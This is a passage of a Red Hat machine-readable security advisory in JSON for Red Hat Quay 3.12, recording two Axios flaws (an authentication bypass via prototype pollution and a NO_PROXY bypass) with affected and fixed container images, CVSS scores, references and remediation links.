            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461629"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability, a Prototype Pollution \"Gadget\" attack, allows an attacker to manipulate the `Object.prototype.validateStatus` property. By polluting this property, all HTTP error responses (such as 401, 403, or 500) are silently treated as successful responses. This can lead to a complete bypass of application-level authentication and error handling, potentially granting unauthorized access.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461629",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461629"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42041",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63"
        }
      ],
      "release_date": "2026-04-24T17:55:30.036000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling"
    },
    {
      "cve": "CVE-2026-42043",
      "cwe": {
        "id": "CWE-918",
        "name": "Server-Side Request Forgery (SSRF)"
      },
      "discovery_date": "2026-04-24T19:01:22.552379+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461626"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. An attacker who can control the destination address of an Axios request can exploit this vulnerability. By using specific internal network addresses (within the 127.0.0.0/8 range, excluding 127.0.0.1), the attacker can completely bypass the NO_PROXY protection, potentially leading to unauthorized access or information disclosure within the network. This issue is an incomplete fix for a previous vulnerability.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: NO_PROXY bypass via crafted URL",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461626",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461626"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42043",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7"
        }
      ],
      "release_date": "2026-04-24T17:54:42.668000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
